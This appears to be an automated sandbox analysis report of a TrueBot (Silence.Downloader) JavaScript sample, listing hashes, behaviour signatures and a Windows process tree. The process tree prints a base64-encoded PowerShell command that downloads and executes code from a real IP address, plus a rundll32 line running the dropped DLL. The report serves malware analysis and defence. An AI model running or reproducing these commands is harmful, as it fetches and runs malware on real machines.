Overview
overview
10Static
static
1000000000/...bf.ps1
windows7-x64
10000000000/...bf.ps1
windows10-2004-x64
101/287b172c...fbd.js
windows7-x64
101/287b172c...fbd.js
windows10-2004-x64
101/3c57867d...008.js
windows7-x64
101/3c57867d...008.js
windows10-2004-x64
101/922b1d76...023.js
windows7-x64
101/922b1d76...023.js
windows10-2004-x64
101/b1978101...66.exe
windows7-x64
11/b1978101...66.exe
windows10-2004-x64
1Analysis
-
max time kernel
143s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
09-04-2023 14:50
Static task
static1
Behavioral task
behavioral1
Sample
000000000/d0c95cfef2e6c85abb28ee971216b3bf.ps1
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
000000000/d0c95cfef2e6c85abb28ee971216b3bf.ps1
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
1/287b172c23da5426cf039ef55d959fbd.js
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
1/287b172c23da5426cf039ef55d959fbd.js
Resource
win10v2004-20230221-en
Behavioral task
behavioral5
Sample
1/3c57867dc4bdeb8a7d55dfb7d8ef5008.js
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
1/3c57867dc4bdeb8a7d55dfb7d8ef5008.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral7
Sample
1/922b1d765a3f88f8b0fb8ee3f71f3023.js
Resource
win7-20230220-en
Behavioral task
behavioral8
Sample
1/922b1d765a3f88f8b0fb8ee3f71f3023.js
Resource
win10v2004-20230220-en
Behavioral task
behavioral9
Sample
1/b19781010225032c77834156cb1eb466.exe
Resource
win7-20230220-en
Behavioral task
behavioral10
Sample
1/b19781010225032c77834156cb1eb466.exe
Resource
win10v2004-20230220-en
General
-
Target
1/3c57867dc4bdeb8a7d55dfb7d8ef5008.js
-
Size
67KB
-
MD5
3c57867dc4bdeb8a7d55dfb7d8ef5008
-
SHA1
e083903420cb64a603d626699ab55e26e39995fc
-
SHA256
c3aaae4bb3952db93ac5d1514761a4490d6eea55ba2ab2f8ae8d306713183d3c
-
SHA512
a77cf3d005729235511024ad727bb8c9c76d7e96fe91a892b868e0939517e1910f3cb21d603824941c06b2c946d9810efd37772e9d99888546a1abf89d4727cc
-
SSDEEP
1536:EMtPc6S1wxBOGKZUXldvp3yZEKs7+QhqWIoCqlO1wKF7x1tNRhn4xVNe/6BPfGMe:i1wxBOGKZUXldvp3yZEKs7+QhqWIoCqK
Malware Config
Extracted
http://62.204.41.69/dll.png
Signatures
-
TrueBot payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\NoSleep.dll family_truebot C:\Users\Admin\AppData\Roaming\NoSleep.dll family_truebot -
TrueBot, Silence.Downloader
A downloader attributed to Silence group first seen in 2017.
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exerundll32.exeflow pid process 16 2992 powershell.exe 36 3536 rundll32.exe 46 3536 rundll32.exe 47 3536 rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 3536 rundll32.exe -
Drops file in Windows directory 1 IoCs
Processes:
rundll32.exedescription ioc process File created C:\Windows\Tasks\MicrosoftEdgeUpdateTaskMachineCore{1575CC8A-457A-1700-652A-6AF2B031A266}.job rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exerundll32.exepid process 2992 powershell.exe 2992 powershell.exe 3536 rundll32.exe 3536 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exerundll32.exedescription pid process Token: SeDebugPrivilege 2992 powershell.exe Token: SeDebugPrivilege 3536 rundll32.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
wscript.execmd.exepowershell.execmd.exedescription pid process target process PID 4348 wrote to memory of 3852 4348 wscript.exe cmd.exe PID 4348 wrote to memory of 3852 4348 wscript.exe cmd.exe PID 3852 wrote to memory of 2992 3852 cmd.exe powershell.exe PID 3852 wrote to memory of 2992 3852 cmd.exe powershell.exe PID 2992 wrote to memory of 4480 2992 powershell.exe cmd.exe PID 2992 wrote to memory of 4480 2992 powershell.exe cmd.exe PID 4480 wrote to memory of 3536 4480 cmd.exe rundll32.exe PID 4480 wrote to memory of 3536 4480 cmd.exe rundll32.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1\3c57867dc4bdeb8a7d55dfb7d8ef5008.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA2⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4ANgA5AC8AZABsAGwALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c rundll32 %APPDATA%\NoSleep.dll,ChkdskExs4⤵
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\system32\rundll32.exerundll32 C:\Users\Admin\AppData\Roaming\NoSleep.dll,ChkdskExs5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49
-
Filesize
1.1MB
MD5f52363b6cf282669e5fcc5537b5c3451
SHA19d9a0b90042fce790ab23191be9cce44c86f13d9
SHA256b803db527f146f0d356700e24836a2e888f74c3dd2196a99f73caa0e57007f34
SHA512d129f4f67691d9042e0bd0d94fabdecf96cadc33d15a662d1910bbb6bbf807eb73cc907f9268aaf99c7680a34d4088b3e79da8cff2dda7f12bc1ba95b44b6b49